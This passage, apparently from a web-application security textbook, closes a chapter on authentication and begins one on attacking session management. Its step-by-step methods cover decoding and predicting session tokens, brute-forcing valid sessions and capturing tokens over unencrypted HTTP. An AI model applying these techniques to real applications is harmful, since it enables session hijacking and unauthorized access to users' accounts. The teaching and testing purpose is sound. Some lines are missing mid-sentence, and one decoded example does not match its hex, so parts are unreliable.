Successful completion of the challenge should be followed by the

process described previously, in which a message is sent to the

user’s registered email address containing a reactivation URL.

Under no circumstances should the application disclose the user’s

forgotten password or simply drop the user into an authenticated

session. Even proceeding directly to the password reset function is

undesirable, because the response to the account recovery challenge

will in general be easier for an attacker to guess than the original

password, and so it should not be relied upon on its own to authen-

ticate the user.

Chapter 6 ■ Attacking Authentication 171

70779c06.qxd:WileyRed 9/14/07 3:13 PM Page 171

Log, Monitor, and Notify

■■

All authentication-related events should be logged by the application,

including login, logout, password change, password reset, account sus-

pension, and account recovery. Where applicable, both failed and suc-

cessful attempts should be logged. The logs should contain all relevant

details (e.g., username, and IP address) but no security secrets (e.g.,

passwords). Logs should be strongly protected from unauthorized

access, as they are a critical source of information leakage.

■■

Anomalies in authentication events should be processed by the applica-

tion’s real-time alerting and intrusion prevention functionality. For

example, application administrators should be made aware of patterns

indicating brute-force attacks, so that appropriate defensive and offen-

sive measures can be considered.

■■

Users should be notified out-of-band of any critical security events. For

example, the application should send a message to a user’s registered

email address whenever he changes his password.

■■

Users should be notified in-band of frequently occurring security

events. For example, after a successful login, the application should

inform users of the time and source IP/domain of the last login, and

the number of invalid login attempts made since then. If a user is

made aware that her account is being subjected to a password-

guessing attack, she is more likely to change her password

frequently and set it to a strong value.

Chapter Summary

Authentication functions are perhaps the most prominent target in a typical

application’s attack surface. By definition, they can be reached by unprivi-

leged, anonymous users. If broken, they grant access to protected functional-

ity and sensitive data. They lie at the core of the security mechanisms that an

application employs to defend itself, and are the front line of defense against

unauthorized access.

Real-world authentication mechanisms contain a myriad of design and

implementation flaws. An effective assault against them needs to proceed sys-

tematically, using a structured methodology to work through every possible

avenue of attack. In many cases, open goals present themselves — bad pass-

words, ways to find out usernames, and vulnerability to brute-force attacks. At

the other end of the spectrum, defects may be very hard to uncover, and it may

require meticulous examination of a convoluted login process to establish the

172 Chapter 6 ■ Attacking Authentication

70779c06.qxd:WileyRed 9/14/07 3:13 PM Page 172

assumptions being made and spot the subtle logic flaw that can be exploited to

walk right through the door.

The most important lesson when attacking authentication functionality is to

look everywhere. In addition to the main login form, there may be functions to

gotten passwords, and impersonate other users. Each of these presents a rich

target of potential defects, and problems that have been consciously elimi-

nated within one function very often reemerge within others. Invest the time

to scrutinize and probe every inch of attack surface you can find, and your

rewards may be great.

Questions

Answers can be found at www.wiley.com/go/webhacker.

1. While testing a web application you log in using your credentials of

joe

and pass. During the login process, you see a request for the following

URL appear in your intercepting proxy:

http://www.wahh-app.com/app?action=login&uname=

joe&password=pass

What three vulnerabilities can you diagnose without probing any

further?

2. How can self-registration functions introduce username enumeration

vulnerabilities? How can these vulnerabilities be prevented?

3. A login mechanism involves the following steps:

(a) The application requests the user’s username and passcode.

(b) The application requests two randomly chosen letters from the

user’s memorable word.

Why is the required information requested in two separate steps? What

defect would the mechanism contain if this were not the case?

4. A multistage login mechanism first requests the user’s username and

then various other items across successive stages. If any supplied item

is invalid, the user is immediately returned to the first stage.

What is wrong with this mechanism, and how can the vulnerability be

corrected?

Chapter 6 ■ Attacking Authentication 173

70779c06.qxd:WileyRed 9/14/07 3:13 PM Page 173

5. An application incorporates an anti-phishing mechanism into its login

functionality. During registration, each user selects a specific image

from a large bank of memorable images presented to them by the appli-

cation. The login function involves the following steps:

(a) The user enters their username and date of birth.

(b) If these details are correct, the application displays to the user their

chosen image; otherwise, a random image is displayed.

their password.

The idea behind the anti-phishing mechanism is that it enables the user

to confirm that they are dealing with the authentic application, and not

a clone, because only the real application knows the correct image to

display to the user.

What vulnerability does the anti-phishing mechanism introduce into

the login function? Is the mechanism effective in preventing phishing?

174 Chapter 6 ■ Attacking Authentication

70779c06.qxd:WileyRed 9/14/07 3:13 PM Page 174

175

The session management mechanism is a fundamental security component in

the majority of web applications. It is what enables the application to uniquely

identify a given user across a number of different requests, and to handle the

data that it accumulates about the state of that user’s interaction with the

application. Where an application implements login functionality, session

management is of particular importance, as it is what enables the application

to persist its assurance of any given user’s identity beyond the request in

which they supply their credentials.

Because of the key role played by session management mechanisms, they

are a prime target for malicious attacks against the application. If an attacker

can break an application’s session management, then she can effectively

bypass its authentication controls and masquerade as other application users

without knowing their credentials. If an attacker compromises an administra-

tive user in this way, then the attacker can own the entire application.

As with authentication mechanisms, there is a wide variety of defects that can

commonly be found in session management functions. In the most vulnerable

cases, an attacker simply needs to increment the value of a token issued to them

by the application in order to switch their context to that of a different user. In

this situation, the application is wide open for anyone to access all areas. At the

other end of the spectrum, an attacker may have to work extremely hard, deci-

phering several layers of obfuscation and devising a sophisticated automated

attack, before finding a chink in the application’s armor.

Attacking Session Management

CHAPTER

70779c07.qxd:WileyRed 9/14/07 3:13 PM Page 175

In this chapter, we will look at all of the types of weakness that the authors

have encountered in real-world web applications. We will set out in detail the

practical steps that you need to take to find and exploit these defects. Finally,

we will describe the defensive measures that applications should take to pro-

tect themselves against these attacks.

COMMON MYTH “We use smartcards for authentication, and users’

sessions cannot be compromised without the card.”

However robust an application’s authentication mechanism, subsequent

requests from users are only linked back to that authentication via the resulting

session. If the application’s session management is flawed, then an attacker

can bypass the robust authentication altogether and still compromise users.

The Need for State

The HTTP protocol is essentially stateless. It is based on a simple request-

response model, in which each pair of messages represents an independent

transaction. The protocol itself contains no mechanism for linking together the

series of requests made by one particular user and distinguishing these from

all of the other requests received by the web server. In the early days of the

Web, there was no need for any such mechanism: web sites were used to pub-

lish static HTML pages for anyone to view. Today, things are very different.

The majority of web “sites” are in fact web applications. They allow you to

erences next time you visit. They deliver rich, multimedia experiences with

content created dynamically based on what you click and type. In order to

implement any of this functionality, web applications need to use the concept

of a session.

The most obvious use of sessions is in applications that support logging in.

After entering your username and password, you can go ahead and use the

application as the user whose credentials you have entered, until such time as

you log out or the session expires due to inactivity. Users do not want to have

to reenter their password on every single page of the application. Hence, after

authenticating the user once, the application creates a session for them, and

treats all requests belonging to that session as coming from that user.

Applications that do not have a login function also typically need to use ses-

sions. Many sites selling merchandise do not require customers to create

accounts. However, they allow users to browse the catalog, add items to a

shopping basket, provide delivery details, and make payment. In this sce-

nario, there is no need to authenticate the identity of the user: for the majority

176 Chapter 7 ■ Attacking Session Management

70779c07.qxd:WileyRed 9/14/07 3:13 PM Page 176

of their visit, the application does not know or care who the user is. But, in

order to do business with them, it needs to know which series of requests it

receives has originated from the same user.

The simplest and still most common means of implementing sessions is to

issue each user with a unique session token or identifier. On each subsequent

request to the application, the user resubmits this token, enabling the application

to determine which sequence of earlier requests the current request relates to.

In most cases, applications use HTTP cookies as the transmission mecha-

nism for passing these session tokens between server and client. The server’s

first response to a new client contains an HTTP header like the following:

Set-Cookie: ASP.NET_SessionId=mza2ji454s04cwbgwb2ttj55

and subsequent requests from the client contain the header:

Cookie: ASP.NET_SessionId=mza2ji454s04cwbgwb2ttj55

There are various categories of attack to which this standard session man-

agement mechanism is inherently vulnerable. An attacker’s primary objective

in targeting the mechanism is to somehow hijack the session of a legitimate

user and thereby masquerade as them. If the user has been authenticated to the

application, the attacker may be able to access private data belonging to the

user or carry out unauthorized actions on that person’s behalf. If the user is

unauthenticated, the attacker may still be able to view sensitive information

submitted by the user during her session.

As in the previous example of a Microsoft IIS server running ASP.NET, most

commercial web servers and web application platforms implement their own

off-the-shelf session management solution based on HTTP cookies. They pro-

vide APIs that web application developers can use to integrate their own

session-dependent functionality with this solution.

Some off-the-shelf implementations of session management have been

found vulnerable to various attacks, which result in users’ sessions being com-

promised (these are discussed later in this chapter). In addition, some devel-

opers find that they need more fine-grained control over session behavior than

is provided for them by the built-in solutions, or wish to avoid some vulnera-

bilities inherent in cookie-based solutions. For these reasons, it is fairly

common to see bespoke and/or non-cookie-based session management mech-

anisms used in security-critical applications such as online banking.

The vulnerabilities that exist in session management mechanisms largely

fall into two categories:

■■

Weaknesses in the generation of session tokens.

■■

Weaknesses in the handling of session tokens throughout their lifecycle.

Chapter 7 ■ Attacking Session Management 177

70779c07.qxd:WileyRed 9/14/07 3:13 PM Page 177

We will look at each of these areas in turn, describing the different types of

defects that are commonly found in real-world session management mecha-

nisms, and practical techniques for discovering and exploiting these. Finally,

we will describe measures that applications can take to defend themselves

against these attacks.

HACK STEPS

In many applications that use the standard cookie mechanism for transmitting

session tokens, it is straightforward to identify which item of data contains the

token. However, in other cases it may require some detective work.

■ The application may often employ several different items of data collec-

tively as a token, including cookies, URL parameters, and hidden form

fields. Some of these items may be used to maintain session state on dif-

ferent back-end components. Do not assume that a particular parameter

is the session token without proving it, or that sessions are being tracked

using only one item.

■ Sometimes, items that appear to be the application’s session token may

not be. In particular, the standard session cookie generated by the web

server or application platform may be present but not actually used by

the application.

■ Observe which new items are passed to the browser after authentication.

Often, new session tokens are created after a user authenticates herself.

■ To verify which items are actually being employed as tokens, find a page

that is certainly session-dependent (such as a user-specific “my details”

page), and make several requests for it, systematically removing each

item that you suspect is being used as a token. If removing an item

causes the session-dependent page not to be returned, then this may

confirm that the item is a session token. Burp Repeater is a useful tool

for performing these tests.

Alternatives to Sessions

Not every web application employs sessions, and some security-critical appli-

cations containing authentication mechanisms and complex functionality opt

to use other techniques for managing state. There are two possible alternatives

that you are likely to encounter:

■■

HTTP authentication — Applications using the various HTTP-based

authentication technologies (basic, digest, NTLM, etc.) sometimes avoid

the need to use sessions. With HTTP authentication, the client compo-

nent interacts with the authentication mechanism directly via the

178 Chapter 7 ■ Attacking Session Management

70779c07.qxd:WileyRed 9/14/07 3:13 PM Page 178

browser, using HTTP headers, and not via application-specific code

contained within any individual page. Once a user has entered his

credentials into a browser dialog, the browser effectively resubmits

these credentials (or reperforms any required handshake) with every

subsequent request to the same server. This is the equivalent to an

application that uses HTML forms-based authentication and places a

themselves with every action they perform. Hence, when HTTP-based

authentication is used, it is possible for an application to re-identify the

user across multiple requests without using sessions. However, HTTP

authentication is rarely used on Internet-based applications of any com-

plexity, and the other very versatile benefits that fully fledged session

mechanisms offer mean that virtually all web applications do in fact

employ them.

■■

Sessionless state mechanisms — Some applications do not issue ses-

sion tokens in order to manage the state of a user’s interaction with the

application but rather transmit all data required to manage that state

via the client, usually in a cookie or a hidden form field. In effect, this

mechanism uses sessionless state in a similar way to the ASP.NET

ViewState. In order for this type of mechanism to be secure, the data

transmitted via the client must be properly protected. This usually

involves constructing a binary blob containing all of the state informa-

tion, and encrypting or signing this using a recognized algorithm. Suffi-

cient context must be included within the data to prevent an attacker

from collecting a state object at one location within the application and

submitting it to another location to cause some undesirable behavior.

The application may also include an expiration time within the object’s

data, to perform the equivalent of session timeouts. Chapter 5 describes

in more detail secure mechanisms for transmitting data via the client.

HACK STEPS

■ If HTTP authentication is being used, it is possible that no session man-

agement mechanism is implemented. Use the methods described previ-

ously to examine the role played by any token-like items of data.

■ If the application uses a sessionless state mechanism, transmitting all

data required to maintain state via the client, this may sometimes be dif-

ficult to detect with certainty, but the following are strong indicators that

this kind of mechanism is being used:

■

Token-like data items issued to the client are fairly long (e.g., 100 or

more bytes).

(continued)

Chapter 7 ■ Attacking Session Management 179

70779c07.qxd:WileyRed 9/14/07 3:13 PM Page 179

HACK STEPS (continued)

■

The application issues a new item in response to every request.

■

The data in the item appears to be encrypted (and so has no dis-

cernible structure) or signed (and so contains meaningful structure

accompanied by a few bytes of meaningless binary data).

■

The application may reject attempts to submit the same item with

more than one request.

■ If the evidence suggests strongly that the application is not using session

tokens to manage state, then it is unlikely that any of the attacks

described within this chapter will achieve anything. Your time is likely to

be much better spent looking for other serious issues such as broken

access controls or code injection.

Weaknesses in Session Token Generation

Session management mechanisms are often vulnerable to attack because

tokens are generated in an unsafe manner that enables an attacker to identify

the values of tokens that have been issued to other users.

Meaningful Tokens

Some session tokens are created using a transformation of the user’s user-

name or email address, or other information associated with them. This infor-

mation may be encoded or obfuscated in some way, and may be combined

with other data.

For example, the following token may initially appear to be a long random

string:

757365723d6461663b6170703d61646d696e3b646174653d30312f31322f3036

However, on closer inspection, it contains only hexadecimal characters.

Guessing that the string may actually be a hex-encoding of a string of ASCII

characters, we can run it through a decoder to reveal:

user=daf;app=admin;date=10/09/07

180 Chapter 7 ■ Attacking Session Management

70779c07.qxd:WileyRed 9/14/07 3:13 PM Page 180

Attackers can exploit the meaning within this session token to attempt to

guess the current sessions of other application users. Using a list of enumer-

ated or common usernames, they can quickly generate large numbers of

potentially valid tokens and test these to confirm which are valid.

Tokens that contain meaningful data often exhibit some structure — that is,

they contain several components, often separated by a delimiter, which can be

extracted and analyzed separately to allow an attacker to understand their

function and means of generation. Components that may be encountered

within structured tokens include:

■■

The account username.

■■

The numeric identifier used by the application to distinguish between

accounts.

■■

The user’s first/last human name.

■■

The user’s email address.

■■

The user’s group or role within the application.

■■

A date/time stamp.

■■

An incrementing or predictable number.

■■

The client IP address.

Each different component within a structured token, or indeed the entire

token, may be encoded in different ways, either as a deliberate measure to

obfuscate their content, or simply to ensure safe transport of binary data via

HTTP. Encoding schemes that are commonly encountered include XOR,

Base64, and hexadecimal representation using ASCII characters (see Chapter 3).

It may be necessary to test various different decodings on each component of

a structured token to unpack it to its original form.

NOTE When an application handles a request containing a structured token,

it may not actually process every component with the token or all of the data

contained within each component. In the previous example, the application

may Base64-decode the token and then process only the “user” and “date”

components. In cases where a token contains a blob of binary data, much of

this data may be padding, and only a small part of it may actually be relevant

to the validation that the server performs on the token. Narrowing down the

subparts of a token that are actually required can often reduce considerably the

amount of apparent entropy and complexity that the token contains.

Chapter 7 ■ Attacking Session Management 181

70779c07.qxd:WileyRed 9/14/07 3:13 PM Page 181

HACK STEPS

■ Obtain a single token from the application, and modify it in systematic

ways to determine whether the entire token is validated, or whether

some subcomponents of the token are ignored. Try changing the token’s

value one byte at a time (or even one bit at a time) and submitting the

modified token back to the application to determine whether it is still

accepted. If you find that certain portions of the token are not actually

required to be correct, you can exclude these from any further analysis,

potentially reducing the amount of work that you need to perform.

■ Log in as several different users at different times and record the tokens

received from the server. If self-registration is available and you can

choose your username, log in with a series of similar usernames contain-

ing small variations between them, such as A, AA, AAA, AAAA, AAAB,

AAAC, AABA, and so on. If other user-specific data is submitted at the

similar exercise to vary that data systematically and record the tokens

received following login.

■ Analyze the tokens for any correlations that appear to be related to the

username and other user-controllable data.

■ Analyze the tokens for any detectable encoding or obfuscation. Where the

username contains a sequence of the same character, look for a corre-

sponding character sequence in the token, which may indicate the use of

XOR obfuscation. Look for sequences in the token containing only hexa-

decimal characters, which may indicate a hex-encoding of an ASCII string

or other information. Look for sequences ending in an equals sign and/or

only containing the other valid Base64 characters: a–z, A–Z, 0–9, +, and /.

■ If any meaning can be reverse engineered from the sample of session

tokens, consider whether you have sufficient information to attempt to

guess the tokens recently issued to other application users. Find a page

of the application that is session-dependent (e.g., one that returns an

error message or a redirect elsewhere if accessed without a valid ses-

sion), and use a tool such as Burp Intruder to make large numbers of

requests to this page using guessed tokens. Monitor the results for any

cases where the page is loaded correctly, indicating a valid session token.

Predictable Tokens

Some session tokens do not contain any meaningful data associating them

with a particular user but are nevertheless guessable because they contain

sequences or patterns that allow an attacker to extrapolate from a sample of

tokens to find other valid tokens recently issued by the application. Even if the

extrapolation involves an amount of trial and error (for example, one valid

182 Chapter 7 ■ Attacking Session Management

70779c07.qxd:WileyRed 9/14/07 3:13 PM Page 182

guess per 1,000 attempts), this will still enable an automated attack to identify

large numbers of valid tokens in a relatively short period of time.

Vulnerabilities relating to predictable token generation may be much easier

to discover in commercial implementations of session management, such as

web servers or web application platforms, than they are in bespoke applica-

tions. When you are remotely targeting a bespoke session management mech-

anism, your sample of issued tokens may be restricted by the capacity of the

server, the activity of other users, your bandwidth, network latency, and so on.

In a laboratory environment, however, you can quickly create millions of sam-

ple tokens, all precisely sequenced and time-stamped, and can eliminate inter-

ference caused by other users.

In the simplest and most brazenly vulnerable cases, an application may use

a simple sequential number as the session token. In this case, you only need to

obtain a sample of two or three tokens before launching an attack that will cap-

ture 100% of currently valid sessions very quickly.

Figure 7-1 shows Burp Intruder being used to cycle the last two digits of a

sequential session token to find values where the session is still active and can

be hijacked. The length of the server’s response is here a reliable indicator that

a valid session has been found.

Figure 7-1: An attack to discover valid sessions where the session token is predictable

In other cases, an application’s tokens may contain more elaborate sequences

that take some effort to discover. The types of potential variations one might

encounter here are open ended, but the authors’ experience in the field indicates

that predictable session tokens commonly arise from three different sources:

■■

Concealed sequences

■■

Time dependency

■■

Weak random number generation

We will look at each of these areas in turn.

Chapter 7 ■ Attacking Session Management 183

70779c07.qxd:WileyRed 9/14/07 3:13 PM Page 183

Concealed Sequences

It is common to encounter session tokens that cannot be trivially predicted

when analyzed in their raw form but that contain sequences that reveal them-

selves when the tokens are suitably decoded or unpacked.

Consider the following series of values, which form one component of a

structured session token:

lwjVJA

Ls3Ajg

xpKr+A

XleXYg

9hyCzA

jeFuNg

JaZZoA

No immediate pattern is discernible; however, a cursory inspection indi-

cates that the tokens may contain Base64-encoded data — in addition to the

mixed-case alphabetical and numeric characters, there is a + character, which

is also valid in a Base64-encoded string. Running the tokens through a Base64

decoder reveals the following:

--Õ$

.ÍÀŽ

Æ’«ø

^W-b

ö‚Ì

?án6

%¦Y

These strings appear to be gibberish and also contain nonprinting charac-

ters. This normally indicates that you are dealing with binary data rather than

ASCII text. Rendering the decoded data as hexadecimal numbers gives you:

9708D524

2ECDC08E

C692ABF8

5E579762

F61C82CC

8DE16E36

25A659A0

There is still no visible pattern. However, if you subtract each number from

the previous one, you arrive at the following:

FF97C4EB6A

97C4EB6A

FF97C4EB6A

184 Chapter 7 ■ Attacking Session Management

70779c07.qxd:WileyRed 9/14/07 3:13 PM Page 184

97C4EB6A

FF97C4EB6A

which immediately reveals the concealed pattern. The algorithm used to gen-

erate tokens adds 0x97C4EB6A to the previous value, truncates the result to a

32-bit number, and Base64-encodes this binary data to allow it to be trans-

ported using the text-based protocol HTTP. Using this knowledge, you can

easily write a script to produce the series of tokens that the server will next

produce, and the series that it produced prior to the captured sample.

Time Dependency

Some web servers and applications employ algorithms for generating session

tokens that use the time of generation as an input to the token’s value. If insuf-

ficient other entropy is incorporated into the algorithm, then you may be able

to predict other users’ tokens. Although any given sequence of tokens on its

own may appear to be completely random, the same sequence coupled with

information about the time at which each token was generated may contain a

discernible pattern. In a busy application, with large numbers of sessions

being created per second, a scripted attack may succeed in identifying large

numbers of other users’ tokens.

When testing the web application of an online retailer, the authors encoun-

tered the following sequence of session tokens:

3124538-1172764258718

3124539-1172764259062

3124540-1172764259281

3124541-1172764259734

3124542-1172764260046

3124543-1172764260156

3124544-1172764260296

3124545-1172764260421

3124546-1172764260812

3124547-1172764260890

Each token is clearly composed of two separate numeric components. The

first number follows a simple incrementing sequence and is trivial to predict.

The second number is increasing by a varying amount each time. Calculating

the differences between its value in each successive token reveals the following:

344

219

453

312

110

Chapter 7 ■ Attacking Session Management 185

70779c07.qxd:WileyRed 9/14/07 3:13 PM Page 185

140

125

391

The sequence does not appear to contain a reliably predictable pattern; how-

ever, it would clearly be possible to brute force the relevant number range in

an automated attack to discover valid values in the sequence. Before attempt-

ing this attack, however, we wait a few minutes and gather a further sequence

of tokens:

3124553-1172764800468

3124554-1172764800609

3124555-1172764801109

3124556-1172764801406

3124557-1172764801703

3124558-1172764802125

3124559-1172764802500

3124560-1172764802656

3124561-1172764803125

3124562-1172764803562

Comparing this second sequence of tokens with the first, two points are

immediately obvious:

■■

The first numeric sequence continues to progress incrementally; how-

ever, five values have been skipped since the end of our first sequence.

This is presumably because the missing values have been issued to

other users, who logged into the application in the window between

the two tests.

■■

The second numeric sequence continues to progress by similar intervals

as before; however, the first value we obtain is a massive 539,578

greater than the previous value.

This second observation immediately alerts us to the role played by time in

generating session tokens. Apparently, only five tokens have been issued

between the two token-grabbing exercises. However, a period of approxi-

mately 10 minutes has also elapsed. The most likely explanation is that the sec-

ond number is time-dependent and is probably a simple count of milliseconds.

Indeed, our hunch is correct, and in a subsequent phase of our testing

we perform a code review, which reveals the following token-generation

algorithm:

String sessId = Integer.toString(s_SessionIndex++) +

“-“ +

System.currentTimeMillis();

186 Chapter 7 ■ Attacking Session Management

70779c07.qxd:WileyRed 9/14/07 3:13 PM Page 186

Given our analysis of how tokens are created, it is straightforward to con-

struct a scripted attack to harvest the session tokens that the application issues

to other users:

■■

We continue polling the server to obtain new session tokens in quick

succession.

■■

We monitor the increments in the first number. When this increases by

more than one, we know that a token has been issued to another user.

■■

When a token has been issued to another user, we know the upper and

lower bounds of the second number that was issued to them, because

we possess the tokens that were issued immediately before and after

theirs. Because we are obtaining new session tokens frequently, the

range between these bounds will typically consist of only a few hun-

dred values.

■■

Each time a token is issued to another user, we launch a brute-force

attack to iterate through each number in the range, appending this to

the missing incremental number that we know was issued to the other

user. We attempt to access a protected page using each token we con-

struct, until the attempt succeeds and we have compromised the user’s

session.

■■

Running this scripted attack continuously will enable us to capture the

session token of every other application user. When an administrative

user logs in, we will fully compromise the entire application.

Weak Random Number Generation

Very little that occurs inside a computer is random. Therefore, when random-

ness is required for some purpose, software uses various techniques to gener-

ate numbers in a pseudo-random manner. Some of the algorithms used

produce sequences that appear to be stochastic and manifest an even spread

across the range of possible values, but can nevertheless be extrapolated for-

wards or backwards with perfect accuracy by anyone who obtains a small

sample of values.

When a predictable pseudo-random number generator is used for produc-

ing session tokens, the resulting tokens are vulnerable to sequencing by an

attacker.

Jetty is a popular web server written in 100% Java, which provides a session

management mechanism for use by applications running on it. In 2006, Chris

Anley of NGSSoftware discovered that the mechanism was vulnerable to a

Chapter 7 ■ Attacking Session Management 187

70779c07.qxd:WileyRed 9/14/07 3:13 PM Page 187

session token prediction attack. The server used the Java API java.util

.Random

to generate session tokens. This implements a “linear congruential

generator,” which generates the next number in the sequence as follows:

synchronized protected int next(int bits) {

seed = (seed * 0x5DEECE66DL + 0xBL) & ((1L << 48) - 1);

return (int)(seed >>> (48 - bits));

}

This algorithm in effect takes the last number generated, multiplies it by one

constant, and adds another constant, to obtain the next number. The number is

truncated to 48 bits, and the algorithm shifts the result to return the specific

number of bits requested by the caller.

Knowing this algorithm and a single number generated by it, we can easily

derive the sequence of numbers that the algorithm will generate next, and also

(with a little number theory) derive the sequence that it generated previously.

This means that an attacker who obtains a single session token from the server

can obtain the tokens of all current and future sessions.

NOTE Sometimes when tokens are created based on the output of a pseudo-

random number generator, developers decide to construct each token by

concatenating together several sequential outputs from the generator. The

perceived rationale for this is that it creates a longer, and therefore “stronger”

token. However, this tactic is usually a mistake. If an attacker can obtain

several consecutive outputs from the generator, this may enable them to infer

some information about its internal state, and may in fact make it easier for

them to extrapolate the generator’s sequence of outputs, either forward or

backward.

HACK STEPS

■ First, determine when and how session tokens are issued by walking

through the application from the first application page through any login

functions. The most common behaviors are: (a) the application creates a

new session any time a request is received that does not submit a token,

and (b) the application creates a new session following a successful

ideally identify a single request (typically either GET / or a login submis-

sion) that results in a new token being issued.

188 Chapter 7 ■ Attacking Session Management

70779c07.qxd:WileyRed 9/14/07 3:13 PM Page 188

HACK STEPS (continued)

■ If a bespoke session management mechanism is in use, and you only

have remote access to the application, obtain a large sample of tokens

(at least a few hundred). Gather these tokens in as quick succession as

possible, to minimize the loss of tokens issued to other users and reduce

the influence of any time dependency. The following screenshot shows

Burp Intruder being used to make large numbers of requests and log the

returned cookies, which can then be exported for further analysis.

■ If a commercial session management mechanism is in use and/or you

have local access to the application, you can obtain indefinitely large

sequences of session tokens in controlled conditions.

■ Attempt to identify any patterns within your sample of cookies. There are

various tools (including the testing suite WebScarab) that will attempt to

perform some automated analysis on a sample of cookies. This kind of

tool is often a useful starting point to get a feel for the amount of varia-

tion contained within a sample of tokens. However, in the authors’ expe-

rience these tools suffer from two limitations. First, they are usually only

effective when the patterns within the sample are relatively obvious and

could be quickly identified through manual analysis; they are poor at

deciphering any encoding and structure within tokens. Second, they

often produce graphical output, which gives the visual impression of

some kind of pattern, even though further analysis establishes that the

pattern is a red herring.

(continued)

Chapter 7 ■ Attacking Session Management 189

70779c07.qxd:WileyRed 9/14/07 3:13 PM Page 189

HACK STEPS (continued)

■ In most cases, there is no real substitute for a manual analysis of the

sample of tokens. There is no magic formula for this, but the following

steps should get you on your way:

■

Apply the knowledge you have already gleaned regarding which com-

ponents and bytes of the token are actually being processed by the

server. Ignore anything that is not processed, even if it varies between

samples.

■

If it is unclear what type of data is contained within the token, or any

individual component of it, try applying various decodings to see if

any more meaningful data emerges. It may be necessary to apply sev-

eral decodings in sequence.

■

Try to identify any patterns in the sequences of values contained

within each decoded token or component. Calculate the differences

between successive values. Even if these appear to be chaotic, there

may be a fixed set of observed differences that narrows down the

scope of any brute-force attack considerably.

■

Obtain a similar sample of cookies after waiting for a few minutes,

and repeat the same analysis. Try to detect whether any of the tokens’

content is time-dependent.

■ If a pattern is detected, reperform the token harvesting exercise from a

different IP address and (if relevant) a different username, to identify

whether the same pattern is detected, and whether tokens received in

the first exercise could be extrapolated to identify tokens received in the

second. Sometimes, the sequence of tokens received by a script running

on a single machine will manifest a pattern, but this will not allow

straightforward extrapolation to the tokens issued to other users

because information such as source IP is used as a source of entropy

(such as a seed to a random number generator).

■ If you believe you have enough insight into the token generation algo-

rithm to mount an automated attack against other users’ sessions, it is

likely that the best means of achieving this is via a customized script,

which can generate tokens using the specific patterns you have observed,

and apply any necessary encoding. See Chapter 13 for some generic tech-

niques for applying automation to this type of problem.

■ If source code is available, closely review the code responsible for gener-

ating session tokens to understand the mechanism used and determine

whether it is vulnerable to prediction.

190 Chapter 7 ■ Attacking Session Management

70779c07.qxd:WileyRed 9/14/07 3:13 PM Page 190

Full-Blown Tests for Randomness

Due to the importance of robust session token generation, performing an effec-

tive attack against a security-critical application such as an online bank may

require carrying out a full-blown methodology to test the randomness of its

tokens. If you do not have access to source code, this will be a black-box exercise.

HACK STEPS

■ Determine the theoretical maximum number of unique tokens that are

available, based on the character set being used and number of bytes

within the token that are actually being validated (as described earlier).

■ Compare each character transition from one token to the next to deter-

mine whether particular transitions are more common than others. If

particular transitions are preferred, there is a likelihood that the algo-

rithm is flawed in some way.

■ Perform NIST FIPS-140-2 statistical tests, identifying any statistically

anomalous distribution of bits.

■ Check for correlations between arbitrary bits; a truly random token will

exhibit no correlation between the state of one bit and the state of

another.

■ These tests cannot be carried out effectively simply by visual inspection.

Of the publicly available tools, Stompy is most effective at carrying out

full-blown tests of randomness.

Weaknesses in Session Token Handling

No matter how effective an application is at ensuring that the session tokens it

generates do not contain any meaningful information and are not susceptible

to analysis or prediction, its session mechanism will be wide open to attack if

those tokens are not handled carefully after generation. For example, if tokens

are disclosed to an attacker via some means, then the attacker can hijack user

sessions even if predicting the tokens is impossible.

There are various ways in which an application’s unsafe handling of tokens

can make it vulnerable to attack.

Chapter 7 ■ Attacking Session Management 191

70779c07.qxd:WileyRed 9/14/07 3:13 PM Page 191

COMMON MYTH “Our token is secure from disclosure to third parties

because we use SSL.”

Proper use of SSL certainly helps to protect session tokens from being

captured. But various mistakes can still result in tokens being transmitted in

clear text even when SSL is in place. And there are various direct attacks

against end users that can be used to obtain their token.

Disclosure of Tokens on the Network

This area of vulnerability arises when the session token is transmitted across

the network in unencrypted form, enabling a suitably positioned eavesdrop-

per to obtain the token and so masquerade as the legitimate user. Suitable posi-

tions for eavesdropping include the user’s local network, within the user’s IT

department, within the user’s ISP, on the Internet backbone, within the appli-

cation’s ISP, and within the IT department of the organization hosting the

application. In each case, this includes both authorized personnel of the rele-

vant organization and any external attackers who have compromised the

infrastructure concerned.

In the simplest case, where an application uses an unencrypted HTTP con-

nection for communications, an attacker can capture all data transmitted

between client and server, including login credentials, personal information,

payment details, and so on. In this situation, an attack against the user’s ses-

sion is often unnecessary because the attacker can already view privileged

information and can log in using captured credentials to perform other mali-

cious actions. However, there may still be instances where the user’s session is

the primary target. For example, if the captured credentials are not sufficient to

perform a second login (e.g., in a banking application, they may include a

number displayed on a changing physical token, or specific digits from the

user’s PIN), the attacker may need to hijack the eavesdropped session in order

to perform arbitrary actions. Or if there is close auditing of logins, and notifi-

cation to the user of each successful login, then an attacker may wish to avoid

performing his own login in order to be as stealthy as possible.

In other cases, an application may use HTTPS to protect key client-server

communications yet may still be vulnerable to interception of session tokens

on the network. There are various ways in which this weakness may occur,

many of which can arise specifically when HTTP cookies are used as the trans-

mission mechanism for session tokens:

■■

Some applications elect to use HTTPS to protect the user’s credentials

during login but then revert to HTTP for the remainder of the user’s

192 Chapter 7 ■ Attacking Session Management

70779c07.qxd:WileyRed 9/14/07 3:13 PM Page 192

session. Many web mail applications behave in this way. In this situa-

tion, an eavesdropper cannot intercept the user’s credentials but may

still capture the session token, as shown in Figure 7-2.

Figure 7-2: Capturing a session token transmitted over HTTP

■■

Some applications use HTTP for preauthenticated areas of the site,

such as the site’s front page, but switch to HTTPS from the login page

onwards. However, in many cases the user is issued a session token at

the first page visited, and this token is not modified when the user logs

in. The user’s session, which is originally unauthenticated, is upgraded

to an authenticated session after login. In this situation an eavesdropper

can intercept a user’s token before login, wait for the user’s communi-

cations to switch to HTTPS, indicating that the user is logging in, and

then attempt to access a protected page (such as My Account) using

that token.

■■

Even if the application issues a fresh token following successful login,

and uses HTTPS from the login page onwards, the token for the user’s

authenticated session may still be disclosed if the user revisits a preau-

thentication page (such as Help or About), either by following links

Chapter 7 ■ Attacking Session Management 193

70779c07.qxd:WileyRed 9/14/07 3:13 PM Page 193

within the authenticated area, by using the Back button, or by typing

the URL directly.

■■

In a variation on the previous case, the application may attempt to

switch to HTTPS when the user clicks the Login link; however, it may

still accept a login over HTTP if the user modifies the URL accordingly.

In this situation, a suitably positioned attacker can modify the pages

returned in the preauthenticated areas of the site so that the Login link

points to an HTTP page. Even if the application issues a fresh session

token after successful login, the attacker may still intercept this token if

he has successfully downgraded the user’s connection to HTTP.

■■

Some applications use HTTP for all static content within the applica-

